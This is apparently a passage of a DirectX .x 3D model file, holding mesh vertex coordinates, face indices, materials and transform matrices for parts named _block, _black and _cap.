0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.000000;0.000000;0.247059;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _block Frame _black { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh black { 344; -1.099777;0.705032;0.436453;, -1.110632;0.714033;0.436421;, -1.108055;0.703103;0.449333;, -1.078739;0.646090;0.449003;, -1.062360;0.648523;0.456372;, -1.069644;0.646827;0.436112;, -1.736440;0.523293;-1.405313;, -1.741377;0.533155;-1.392496;, -1.739216;0.517536;-1.405399;, -1.747643;0.520166;-1.392518;, -1.730978;0.480831;-1.404778;, -1.383979;0.432141;-1.404038;, -1.414729;0.564276;-1.406105;, -1.407191;0.565983;-1.393201;, -1.420497;0.589962;-1.406550;, -1.413909;0.595959;-1.393684;, -1.425423;0.593876;-1.406640;, -1.425191;0.604911;-1.393825;, -1.529690;0.577747;-1.406256;, -1.532270;0.588348;-1.393439;, -1.635464;0.553743;-1.405811;, -1.637667;0.564428;-1.392997;, -1.635502;0.553596;-1.425540;, -1.736475;0.523148;-1.425042;, -1.739255;0.517389;-1.425130;, -1.731021;0.480684;-1.424507;, -1.414767;0.564130;-1.425834;, -1.420531;0.589817;-1.426278;, -1.425463;0.593729;-1.426367;, -1.529727;0.577601;-1.425984;, -1.731091;0.480836;-1.434837;, -1.707913;0.531996;-1.435516;, -1.736554;0.523350;-1.435373;, -1.739326;0.517594;-1.435460;, -1.425489;0.594271;-1.436706;, -1.459931;0.588923;-1.436579;, -1.412835;0.556182;-1.436038;, -1.420557;0.590358;-1.436616;, -1.459063;0.546390;-1.516568;, -1.452846;0.560503;-1.436114;, -1.441213;0.551183;-1.435958;, -1.688226;0.490260;-1.515672;, -1.705714;0.486835;-1.434933;, -1.699693;0.499794;-1.435104;, -1.696570;0.522921;-1.516078;, -1.708004;0.531315;-1.503275;, -1.632904;0.542128;-1.516391;, -1.635633;0.553099;-1.503631;, -1.527621;0.566021;-1.516834;, -1.529858;0.577104;-1.504076;, -1.466325;0.575534;-1.517068;, -1.460049;0.588026;-1.504334;, -1.452969;0.559605;-1.503868;, -1.459295;0.554039;-1.516695;, -1.441337;0.550284;-1.503715;, -1.442731;0.538477;-1.516491;, -1.419358;0.542593;-1.516622;, -1.412963;0.555283;-1.503794;, -1.395541;0.440169;-1.514846;, -1.386714;0.442319;-1.502028;, -1.392973;0.429333;-1.501880;, -1.696338;0.370125;-1.515698;, -1.693769;0.359290;-1.502677;, -1.705124;0.368175;-1.502690;, -1.719848;0.471171;-1.515432;, -1.731177;0.480155;-1.502597;, -1.705801;0.486156;-1.502693;, -1.699535;0.475973;-1.515501;, -1.699776;0.499115;-1.502864;, -1.691617;0.497135;-1.515757;, -1.693625;0.359900;-1.424586;, -1.702420;0.357898;-1.418034;, -1.704981;0.368785;-1.424601;, -1.386559;0.442931;-1.423938;, -1.384007;0.432043;-1.417191;, -1.392830;0.429943;-1.423790;, -1.612096;0.657376;-1.149165;, -1.602386;0.617973;-1.149164;, -1.600134;0.660335;-1.094923;, -1.590424;0.620933;-1.094923;, -1.567654;0.668374;-1.055159;, -1.557944;0.628971;-1.055156;, -1.523358;0.679337;-1.040524;, -1.513649;0.639934;-1.040523;, -1.479119;0.690287;-1.054943;, -1.469409;0.650885;-1.054941;, -1.446787;0.698291;-1.094550;, -1.437076;0.658888;-1.094550;, -1.435027;0.701203;-1.148735;, -1.425317;0.661801;-1.148733;, -1.446989;0.698245;-1.202977;, -1.437278;0.658841;-1.202976;, -1.479470;0.690207;-1.242742;, -1.469759;0.650805;-1.242741;, -1.523763;0.679245;-1.257378;, -1.514054;0.639841;-1.257376;, -1.568004;0.668293;-1.242958;, -1.558294;0.628891;-1.242958;, -1.600337;0.660289;-1.203351;, -1.590626;0.620886;-1.203349;, -1.522168;0.642577;-1.031216;, -1.556396;0.634105;-1.042524;, -1.563897;0.664552;-1.042524;, -1.529672;0.673024;-1.031217;, -1.601843;0.622858;-1.098168;, -1.611088;0.620571;-1.140081;, -1.618589;0.651018;-1.140081;, -1.609347;0.653304;-1.098169;, -1.594631;0.624646;-1.215902;, -1.569647;0.630831;-1.246506;, -1.577151;0.661278;-1.246507;, -1.602133;0.655093;-1.215902;, -1.507743;0.646154;-1.266684;, -1.473516;0.654626;-1.255375;, -1.481018;0.685073;-1.255376;, -1.515245;0.676602;-1.266685;, -1.428067;0.665873;-1.199732;, -1.418823;0.668160;-1.157818;, -1.426326;0.698607;-1.157818;, -1.435568;0.696320;-1.199732;, -1.435280;0.664085;-1.081997;, -1.460263;0.657900;-1.051393;, -1.467766;0.688347;-1.051391;, -1.442781;0.694532;-1.081997;, -1.576523;0.669443;-1.112118;, -1.584677;0.667426;-1.149097;, -1.576662;0.669412;-1.186038;, -1.554621;0.674870;-1.213041;, -1.524457;0.682335;-1.222869;, -1.494259;0.689808;-1.212894;, -1.472115;0.695289;-1.185783;, -1.463959;0.697306;-1.148804;, -1.471978;0.695320;-1.111863;, -1.494021;0.689863;-1.084860;, -1.524181;0.682399;-1.075030;, -1.554379;0.674924;-1.085007;, -1.498168;0.695287;-1.090464;, -1.525692;0.688474;-1.081494;, -1.553249;0.681653;-1.090598;, -1.573458;0.676652;-1.115338;, -1.580899;0.674811;-1.149085;, -1.573585;0.676624;-1.182795;, -1.553468;0.681603;-1.207437;, -1.525944;0.688416;-1.216407;, -1.498385;0.695237;-1.207303;, -1.478179;0.700238;-1.182564;, -1.470734;0.702079;-1.148816;, -1.478052;0.700267;-1.115106;, -1.565933;0.626997;-1.185854;, -1.573911;0.625022;-1.149095;, -1.565797;0.627029;-1.112298;, -1.543764;0.632482;-1.085322;, -1.513715;0.639919;-1.075394;, -1.483702;0.647348;-1.085175;, -1.461769;0.652777;-1.112045;, -1.453788;0.654753;-1.148802;, -1.461906;0.652745;-1.185600;, -1.483940;0.647294;-1.212579;, -1.513990;0.639856;-1.222503;, -1.544001;0.632427;-1.212724;, -1.476751;0.608620;-1.212582;, -1.504626;0.601689;-1.222503;, -1.532467;0.594766;-1.212718;, -1.552819;0.589704;-1.185845;, -1.560223;0.587862;-1.149084;, -1.552701;0.589732;-1.112288;, -1.532264;0.594813;-1.085315;, -1.504390;0.601743;-1.075393;, -1.476549;0.608667;-1.085181;, -1.456198;0.613727;-1.112054;, -1.448794;0.615569;-1.148813;, -1.456315;0.613700;-1.185609;, 0.073221;0.670937;0.435547;, 0.084210;0.679774;0.435536;, 0.081491;0.668879;0.448448;, 0.051315;0.612314;0.448082;, 0.034985;0.614989;0.455413;, 0.042210;0.613193;0.435170;, 0.704072;0.480393;-1.404741;, 0.709177;0.490174;-1.391918;, 0.706760;0.474596;-1.404819;, 0.715246;0.477093;-1.391919;, 0.697967;0.438020;-1.404195;, 0.350271;0.394543;-1.404217;, 0.383017;0.526198;-1.406286;, 0.375525;0.528012;-1.393400;, 0.389172;0.551794;-1.406732;, 0.382699;0.557883;-1.393884;, 0.394160;0.555634;-1.406813;, 0.394114;0.566666;-1.394002;, 0.498168;0.537942;-1.406184;, 0.500927;0.548498;-1.393367;, 0.603566;0.512353;-1.405486;, 0.605952;0.522999;-1.392672;, 0.603570;0.512213;-1.425215;, 0.704072;0.480255;-1.424471;, 0.706767;0.474455;-1.424548;, 0.697976;0.437880;-1.423925;, 0.383019;0.526059;-1.426017;, 0.389171;0.551655;-1.426462;, 0.394165;0.555493;-1.426542;, 0.498171;0.537803;-1.425913;, 0.698030;0.438034;-1.434256;, 0.675631;0.489535;-1.435014;, 0.704137;0.480461;-1.434803;, 0.706822;0.474664;-1.434880;, 0.394182;0.556039;-1.436881;, 0.428538;0.550175;-1.436672;, 0.380955;0.518145;-1.436220;, 0.389189;0.552201;-1.436799;, 0.426896;0.507692;-1.516641;, 0.421024;0.521866;-1.436207;, 0.409253;0.512720;-1.436073;, 0.655180;0.448132;-1.515195;, 0.672750;0.444414;-1.434413;, 0.666923;0.457461;-1.434605;, 0.664019;0.480663;-1.515600;, 0.675598;0.488880;-1.502776;, 0.600654;0.500823;-1.516068;, 0.603568;0.511745;-1.503308;, 0.495740;0.526293;-1.516764;, 0.498168;0.537335;-1.504007;, 0.434597;0.536723;-1.517140;, 0.428535;0.549303;-1.504429;, 0.421026;0.520993;-1.503964;, 0.427244;0.515337;-1.516773;, 0.409255;0.511846;-1.503831;, 0.410447;0.500025;-1.516597;, 0.387136;0.504493;-1.516785;, 0.380954;0.517271;-1.503977;, 0.361773;0.402440;-1.515007;, 0.353000;0.404717;-1.502210;, 0.359063;0.391639;-1.502041;, 0.661475;0.327893;-1.515139;, 0.658761;0.317093;-1.502117;, 0.670249;0.325807;-1.502109;, 0.686512;0.428571;-1.514873;, 0.697998;0.437379;-1.502018;, 0.672713;0.443759;-1.502173;, 0.666272;0.433678;-1.514991;, 0.666883;0.456807;-1.502366;, 0.658677;0.454954;-1.515276;, 0.658755;0.317674;-1.424023;, 0.667528;0.315538;-1.417450;, 0.670244;0.326388;-1.424017;, 0.352983;0.405301;-1.424118;, 0.350273;0.394450;-1.417371;, 0.359054;0.392221;-1.423949;, 0.582925;0.616039;-1.148938;, 0.572614;0.576790;-1.148938;, 0.571011;0.619178;-1.094722;, 0.560703;0.579928;-1.094722;, 0.538461;0.627751;-1.055032;, 0.528152;0.588500;-1.055032;, 0.493994;0.639462;-1.040504;, 0.483686;0.600213;-1.040504;, 0.449531;0.651173;-1.055031;, 0.439220;0.611923;-1.055031;, 0.416977;0.659746;-1.094719;, 0.406669;0.620497;-1.094719;, 0.405063;0.662885;-1.148932;, 0.394751;0.623635;-1.148932;, 0.416975;0.659746;-1.203149;, 0.406666;0.620497;-1.203149;, 0.449527;0.651173;-1.242838;, 0.439216;0.611923;-1.242838;, 0.493992;0.639462;-1.257366;, 0.483679;0.600212;-1.257366;, 0.538455;0.627751;-1.242841;, 0.528146;0.588501;-1.242840;, 0.571008;0.619178;-1.203153;, 0.560702;0.579928;-1.203152;, 0.492321;0.602706;-1.031179;, 0.526681;0.593656;-1.042405;, 0.534648;0.623986;-1.042406;, 0.500288;0.633035;-1.031180;, 0.572232;0.581660;-1.097942;, 0.581434;0.579235;-1.139834;, 0.589403;0.609564;-1.139836;, 0.580196;0.611989;-1.097942;, 0.564760;0.583627;-1.215699;, 0.539606;0.590252;-1.246365;, 0.547575;0.620580;-1.246365;, 0.572730;0.613956;-1.215699;, 0.477384;0.606639;-1.266691;, 0.443027;0.615689;-1.255466;, 0.450993;0.646016;-1.255465;, 0.485351;0.636968;-1.266691;, 0.397484;0.627685;-1.199928;, 0.388276;0.630110;-1.158034;, 0.396236;0.660439;-1.158034;, 0.405448;0.658014;-1.199929;, 0.404951;0.625718;-1.082172;, 0.430104;0.619094;-1.051506;, 0.438070;0.649423;-1.051506;, 0.412915;0.656048;-1.082172;, 0.547304;0.628697;-1.111977;, 0.555427;0.626558;-1.148937;, 0.547304;0.628697;-1.185899;, 0.525111;0.634542;-1.212955;, 0.494792;0.642526;-1.222859;, 0.464478;0.650511;-1.212953;, 0.442287;0.656356;-1.185895;, 0.434166;0.658495;-1.148933;, 0.442290;0.656356;-1.111973;, 0.464483;0.650511;-1.084916;, 0.494795;0.642526;-1.075012;, 0.525113;0.634542;-1.084917;, 0.468726;0.655867;-1.090513;, 0.496385;0.648580;-1.081475;, 0.524050;0.641296;-1.090514;, 0.544306;0.635960;-1.115207;, 0.551717;0.634009;-1.148937;, 0.544306;0.635961;-1.182667;, 0.524049;0.641295;-1.207358;, 0.496383;0.648581;-1.216395;, 0.468721;0.655867;-1.207356;, 0.448471;0.661201;-1.182664;, 0.441059;0.663153;-1.148933;, 0.448471;0.661201;-1.115205;, 0.535930;0.586452;-1.185716;, 0.544012;0.584322;-1.148937;, 0.535931;0.586452;-1.112157;, 0.513849;0.592267;-1.085232;, 0.483684;0.600213;-1.075377;, 0.453518;0.608157;-1.085231;, 0.431436;0.613973;-1.112155;, 0.423354;0.616101;-1.148933;, 0.431436;0.613973;-1.185714;, 0.453516;0.608157;-1.212638;, 0.483681;0.600213;-1.222493;, 0.513844;0.592267;-1.212639;, 0.446019;0.569528;-1.212639;, 0.473769;0.562185;-1.222495;, 0.501517;0.554840;-1.212641;, 0.521835;0.549464;-1.185717;, 0.529270;0.547497;-1.148939;, 0.521836;0.549464;-1.112160;, 0.501521;0.554840;-1.085235;, 0.473772;0.562184;-1.075379;, 0.446021;0.569528;-1.085232;, 0.425708;0.574904;-1.112156;, 0.418272;0.576872;-1.148934;, 0.425705;0.574904;-1.185715;; 294; 3;2,0,1;, 4;3,5,0,2;, 3;3,4,5;, 6;203,204,205,202,214,215;, 4;202,237,238,214;, 4;237,236,239,238;, 4;233,234,232,230;, 3;246,245,247;, 4;212,226,229,208;, 4;226,227,228,229;, 6;212,208,209,206,207,211;, 4;285,286,287,284;, 12;317,318,319,308,309,310,311,312,313,314,315,316;, 4;289,290,291,288;, 12;341,342,343,332,333,334,335,336,337,338,339,340;, 4;277,278,279,276;, 4;273,274,275,272;, 4;293,294,295,292;, 4;281,282,283,280;, 3;243,242,244;, 3;73,74,75;, 4;62,61,58,60;, 3;70,71,72;, 6;32,31,43,42,30,33;, 4;65,30,42,66;, 4;64,65,66,67;, 4;55,54,57,56;, 4;54,40,36,57;, 6;36,40,39,35,34,37;, 4;114,113,112,115;, 12;146,145,144,143,142,141,140,139,138,137,136,147;, 4;118,117,116,119;, 12;170,169,168,167,166,165,164,163,162,161,160,171;, 4;106,105,104,107;, 4;102,101,100,103;, 4;122,121,120,123;, 4;110,109,108,111;, 4;92,114,115,94;, 4;94,128,129,92;, 4;96,127,128,94;, 4;98,126,127,96;, 4;96,110,111,98;, 4;76,125,126,98;, 4;125,140,141,126;, 4;126,141,142,127;, 4;127,142,143,128;, 4;128,143,144,129;, 4;129,144,145,130;, 4;130,145,146,131;, 4;90,130,131,88;, 4;88,118,119,90;, 4;92,129,130,90;, 4;131,146,147,132;, 4;88,131,132,86;, 4;86,132,133,84;, 4;132,147,136,133;, 4;133,136,137,134;, 4;134,137,138,135;, 4;82,134,135,80;, 4;84,133,134,82;, 4;84,122,123,86;, 4;80,102,103,82;, 4;80,135,124,78;, 4;135,138,139,124;, 4;124,139,140,125;, 4;78,124,125,76;, 4;76,106,107,78;, 4;89,117,118,88;, 4;87,89,88,86;, 4;86,123,120,87;, 4;85,121,122,84;, 4;83,85,84,82;, 4;82,103,100,83;, 4;95,112,113,93;, 4;93,157,158,95;, 4;95,158,159,97;, 4;97,159,148,99;, 4;99,108,109,97;, 4;99,148,149,77;, 4;77,149,150,79;, 4;79,104,105,77;, 4;79,150,151,81;, 4;81,151,152,83;, 4;83,152,153,85;, 4;85,153,154,87;, 4;87,120,121,85;, 4;87,154,155,89;, 4;89,155,156,91;, 4;91,116,117,89;, 4;91,156,157,93;, 4;83,100,101,81;, 4;93,113,114,92;, 4;91,93,92,90;, 4;90,119,116,91;, 4;94,115,112,95;, 4;95,97,96,94;, 4;97,109,110,96;, 4;78,107,104,79;, 4;79,81,80,78;, 4;81,101,102,80;, 4;98,111,108,99;, 4;99,77,76,98;, 4;77,105,106,76;, 4;157,160,161,158;, 4;158,161,162,159;, 4;159,162,163,148;, 4;148,163,164,149;, 4;149,164,165,150;, 4;150,165,166,151;, 4;151,166,167,152;, 4;152,167,168,153;, 4;153,168,169,154;, 4;154,169,170,155;, 4;155,170,171,156;, 4;156,171,160,157;, 3;172,174,173;, 4;177,175,174,172;, 3;177,176,175;, 4;286,264,266,287;, 4;300,266,264,301;, 4;299,268,266,300;, 4;298,270,268,299;, 4;282,268,270,283;, 4;297,248,270,298;, 4;312,297,298,313;, 4;313,298,299,314;, 4;314,299,300,315;, 4;315,300,301,316;, 4;316,301,302,317;, 4;317,302,303,318;, 4;302,262,260,303;, 4;290,260,262,291;, 4;301,264,262,302;, 4;318,303,304,319;, 4;303,260,258,304;, 4;304,258,256,305;, 4;319,304,305,308;, 4;308,305,306,309;, 4;309,306,307,310;, 4;306,254,252,307;, 4;305,256,254,306;, 4;294,256,258,295;, 4;274,252,254,275;, 4;307,252,250,296;, 4;310,307,296,311;, 4;311,296,297,312;, 4;296,250,248,297;, 4;278,248,250,279;, 4;289,261,260,290;, 4;261,259,258,260;, 4;295,258,259,292;, 4;275,254,255,272;, 4;257,255,254,256;, 4;293,257,256,294;, 4;284,267,265,285;, 4;329,265,267,330;, 4;330,267,269,331;, 4;331,269,271,320;, 4;280,271,269,281;, 4;320,271,249,321;, 4;321,249,251,322;, 4;276,251,249,277;, 4;322,251,253,323;, 4;323,253,255,324;, 4;324,255,257,325;, 4;325,257,259,326;, 4;292,259,257,293;, 4;326,259,261,327;, 4;327,261,263,328;, 4;288,263,261,289;, 4;328,263,265,329;, 4;272,255,253,273;, 4;285,265,264,286;, 4;265,263,262,264;, 4;291,262,263,288;, 4;281,269,268,282;, 4;269,267,266,268;, 4;287,266,267,284;, 4;279,250,251,276;, 4;253,251,250,252;, 4;273,253,252,274;, 4;283,270,271,280;, 4;249,271,270,248;, 4;277,249,248,278;, 4;333,330,331,334;, 4;332,329,330,333;, 4;343,328,329,332;, 4;342,327,328,343;, 4;341,326,327,342;, 4;340,325,326,341;, 4;339,324,325,340;, 4;338,323,324,339;, 4;337,322,323,338;, 4;336,321,322,337;, 4;335,320,321,336;, 4;334,331,320,335;, 4;18,19,17,16;, 4;16,28,29,18;, 4;29,28,34,35;, 4;35,51,49,29;, 4;29,49,47,22;, 4;18,29,22,20;, 4;20,21,19,18;, 4;6,7,21,20;, 4;20,22,23,6;, 4;22,31,32,23;, 4;22,47,45,31;, 4;23,32,33,24;, 4;6,23,24,8;, 4;8,9,7,6;, 4;8,24,25,10;, 4;25,24,33,30;, 5;30,65,63,72,25;, 4;65,64,61,63;, 3;61,62,63;, 4;63,62,70,72;, 4;15,14,16,17;, 4;14,15,13,12;, 4;12,26,27,14;, 5;73,36,37,27,26;, 4;27,37,34,28;, 4;14,27,28,16;, 5;11,74,73,26,12;, 4;73,59,57,36;, 4;59,58,56,57;, 3;58,59,60;, 4;60,59,73,75;, 4;50,51,52,53;, 4;53,52,54,55;, 4;39,40,54,52;, 4;51,35,39,52;, 4;51,50,48,49;, 4;49,48,46,47;, 4;47,46,44,45;, 6;58,61,67,41,38,55;, 3;58,55,56;, 3;55,38,53;, 8;44,46,48,50,53,38,41,69;, 3;69,41,67;, 3;61,64,67;, 4;69,68,45,44;, 4;67,66,68,69;, 4;42,43,68,66;, 4;68,43,31,45;, 4;181,180,178,179;, 4;179,178,192,193;, 4;194,192,178,195;, 4;203,194,195,204;, 4;204,195,196,205;, 4;196,197,202,205;, 4;196,180,182,197;, 4;195,178,180,196;, 4;219,194,203,217;, 4;221,201,194,219;, 4;201,190,192,194;, 4;193,192,190,191;, 4;191,190,188,189;, 4;200,188,190,201;, 4;200,201,207,206;, 4;223,207,201,221;, 4;209,199,200,206;, 4;199,186,188,200;, 4;186,187,189,188;, 4;187,186,184,185;, 4;198,184,186,199;, 5;208,245,198,199,209;, 5;246,183,184,198,245;, 4;231,245,208,229;, 4;230,231,229,228;, 3;231,230,232;, 4;231,232,247,245;, 3;234,233,235;, 4;234,235,244,242;, 5;237,202,197,244,235;, 4;236,237,235,233;, 4;223,222,225,224;, 4;224,225,227,226;, 4;212,211,224,226;, 4;207,223,224,211;, 4;218,219,217,216;, 4;220,221,219,218;, 4;222,223,221,220;, 3;236,233,239;, 6;233,230,227,210,213,239;, 3;213,241,239;, 8;218,216,241,213,210,225,222,220;, 3;210,227,225;, 3;227,230,228;, 4;240,241,216,217;, 4;238,239,241,240;, 4;215,214,238,240;, 4;215,240,217,203;, 4;70,62,60,75;, 4;234,242,247,232;; MeshMaterialList { 1; 294; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;; Material { 0.498039;0.498039;0.498039;1.0;; 60.0; 0.000000;0.000000;0.000000;; 0.000000;0.000000;0.000000;; } # Material } # MeshMaterialList } # Mesh } # Frame _black Frame _cap { FrameTransformMatrix { 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000, 0.000000, 0.000000, 0.000000, 0.000000, 1.000000;; } #FrameTransformMatrix Mesh cap { 1631; -0.421855;0.478616;-1.181678;, -0.407745;0.478616;-1.228321;, -0.416645;0.478616;-1.129190;, -0.352839;0.478616;-1.052801;, -0.253708;0.478616;-1.043903;, -0.163210;0.478616;-1.154351;, -0.191425;0.478616;-1.249797;, -0.168419;0.478616;-1.206839;, -0.278869;0.478616;-1.297337;, -0.233190;0.594795;-1.266270;, -0.240067;0.594793;-1.250550;, -0.228547;0.594795;-1.263280;, -0.236680;0.621389;-1.269690;, -0.236678;0.596823;-1.269680;, -0.232291;0.596807;-1.268070;, -0.232293;0.621383;-1.268080;, -0.227274;0.596808;-1.264840;, -0.227272;0.621383;-1.264840;, -0.224010;0.596823;-1.261490;, -0.224008;0.621389;-1.261490;, -0.221921;0.596815;-1.257470;, -0.221922;0.621389;-1.257480;, -0.220921;0.596802;-1.253400;, -0.220920;0.621378;-1.253410;, -0.220830;0.596823;-1.248580;, -0.220828;0.621378;-1.248590;, -0.222595;0.596788;-1.243580;, -0.222593;0.621362;-1.243590;, -0.226527;0.596790;-1.237550;, -0.226528;0.621362;-1.237550;, -0.230485;0.596823;-1.233900;, -0.230487;0.621378;-1.233900;, -0.235154;0.596802;-1.232010;, -0.235156;0.621378;-1.232010;, -0.239324;0.596819;-1.231280;, -0.239326;0.621391;-1.231280;, -0.243708;0.596823;-1.231630;, -0.243707;0.621391;-1.231630;, -0.247915;0.596812;-1.233200;, -0.247913;0.621388;-1.233200;, -0.252674;0.596812;-1.236280;, -0.252673;0.621388;-1.236280;, -0.255834;0.596823;-1.239470;, -0.255833;0.621391;-1.239480;, -0.257945;0.596819;-1.243330;, -0.257944;0.621391;-1.243330;, -0.258999;0.596802;-1.247420;, -0.258998;0.621378;-1.247420;, -0.259183;0.596823;-1.252460;, -0.259182;0.621378;-1.252460;, -0.257479;0.596790;-1.257570;, -0.257480;0.621362;-1.257570;, -0.253586;0.596788;-1.263630;, -0.253583;0.621362;-1.263630;, -0.249755;0.596823;-1.267290;, -0.249752;0.621378;-1.267290;, -0.245320;0.596802;-1.269180;, -0.245318;0.621378;-1.269190;, -0.241198;0.596815;-1.269940;, -0.241194;0.621389;-1.269940;, -0.243938;0.674236;-1.265000;, -0.247584;0.674236;-1.263440;, -0.248323;0.672532;-1.265010;, -0.244675;0.672532;-1.266570;, -0.249892;0.674236;-1.239660;, -0.245976;0.674236;-1.237130;, -0.246919;0.672541;-1.235670;, -0.250832;0.672541;-1.238210;, -0.225235;0.674236;-1.248990;, -0.225311;0.674236;-1.252950;, -0.223575;0.672532;-1.252920;, -0.223498;0.672532;-1.248950;, -0.224480;0.672543;-1.256600;, -0.224304;0.669166;-1.256640;, -0.223399;0.669157;-1.252970;, -0.243116;0.672544;-1.234250;, -0.243177;0.669154;-1.234080;, -0.246975;0.669150;-1.235500;, -0.251786;0.672515;-1.261710;, -0.251904;0.669077;-1.261850;, -0.248442;0.669095;-1.265150;, -0.223323;0.669095;-1.248900;, -0.222512;0.652105;-1.252990;, -0.222435;0.652044;-1.248920;, -0.250964;0.669150;-1.238080;, -0.247447;0.652098;-1.234770;, -0.251437;0.652098;-1.237340;, -0.244708;0.669157;-1.266740;, -0.248787;0.652044;-1.265960;, -0.245051;0.652105;-1.267560;, -0.240951;0.672543;-1.267250;, -0.241075;0.674236;-1.265510;, -0.225093;0.672515;-1.244440;, -0.226542;0.674236;-1.245390;, -0.224200;0.652026;-1.243930;, -0.224917;0.669077;-1.244390;, -0.254596;0.652103;-1.240540;, -0.253818;0.669154;-1.240960;, -0.240929;0.652115;-1.268320;, -0.240982;0.669166;-1.267430;, -0.243351;0.674236;-1.261660;, -0.245362;0.674236;-1.260810;, -0.247403;0.674236;-1.241970;, -0.244888;0.674236;-1.240340;, -0.228545;0.674236;-1.249930;, -0.228586;0.674236;-1.252120;, -0.235386;0.652103;-1.233620;, -0.231454;0.652036;-1.235220;, -0.227495;0.652019;-1.238870;, -0.240490;0.674236;-1.262190;, -0.240849;0.674236;-1.255600;, -0.249687;0.674236;-1.244240;, -0.243909;0.674236;-1.247370;, -0.229853;0.674236;-1.246340;, -0.235110;0.674236;-1.249720;, -0.226006;0.674236;-1.255770;, -0.250323;0.674236;-1.260770;, -0.238774;0.674236;-1.255480;, -0.238415;0.674236;-1.262070;, -0.244870;0.674236;-1.249140;, -0.250647;0.674236;-1.246000;, -0.237232;0.674236;-1.246470;, -0.231973;0.674236;-1.243080;, -0.252174;0.674236;-1.241930;, -0.237126;0.652091;-1.268100;, -0.232741;0.652084;-1.266490;, -0.256372;0.652115;-1.243780;, -0.257431;0.652103;-1.247880;, -0.257587;0.652036;-1.252120;, -0.255880;0.652019;-1.257230;, -0.239553;0.652115;-1.232910;, -0.228535;0.652084;-1.263780;, -0.225266;0.652091;-1.260430;, -0.229282;0.674236;-1.254940;, -0.241878;0.674236;-1.239190;, -0.242967;0.674236;-1.235980;, -0.248100;0.674236;-1.258140;, -0.235152;0.674236;-1.251910;, -0.241393;0.674236;-1.245740;, -0.242857;0.674236;-1.254740;, -0.231905;0.672530;-1.236180;, -0.232620;0.674236;-1.237760;, -0.229778;0.674236;-1.240420;, -0.228328;0.672515;-1.239470;, -0.237178;0.669142;-1.267210;, -0.237236;0.672543;-1.267040;, -0.255597;0.669166;-1.244210;, -0.255422;0.672544;-1.244250;, -0.253686;0.672544;-1.241090;, -0.228212;0.669071;-1.239330;, -0.223513;0.652115;-1.257050;, -0.252619;0.652026;-1.262310;, -0.230241;0.674236;-1.256780;, -0.227721;0.674236;-1.259070;, -0.239884;0.674236;-1.239040;, -0.239364;0.674236;-1.235700;, -0.250199;0.674236;-1.254870;, -0.253528;0.674236;-1.255790;, -0.233215;0.669135;-1.265760;, -0.256550;0.669154;-1.247910;, -0.231789;0.669086;-1.236040;, -0.226193;0.672543;-1.259900;, -0.230086;0.674236;-1.261460;, -0.229143;0.672536;-1.262920;, -0.254990;0.672515;-1.256720;, -0.254793;0.674236;-1.252100;, -0.256529;0.672530;-1.252100;, -0.239515;0.672544;-1.233970;, -0.253908;0.674236;-1.245100;, -0.232606;0.674236;-1.259170;, -0.235747;0.672530;-1.234620;, -0.235719;0.669154;-1.234440;, -0.239486;0.669166;-1.233790;, -0.256703;0.669086;-1.252150;, -0.255165;0.669071;-1.256760;, -0.226059;0.669142;-1.260020;, -0.243242;0.652103;-1.233200;, -0.236464;0.674236;-1.236200;, -0.237359;0.674236;-1.265310;, -0.235268;0.674236;-1.260900;, -0.251381;0.674236;-1.248850;, -0.234816;0.674236;-1.240420;, -0.233273;0.672536;-1.265590;, -0.234215;0.674236;-1.264130;, 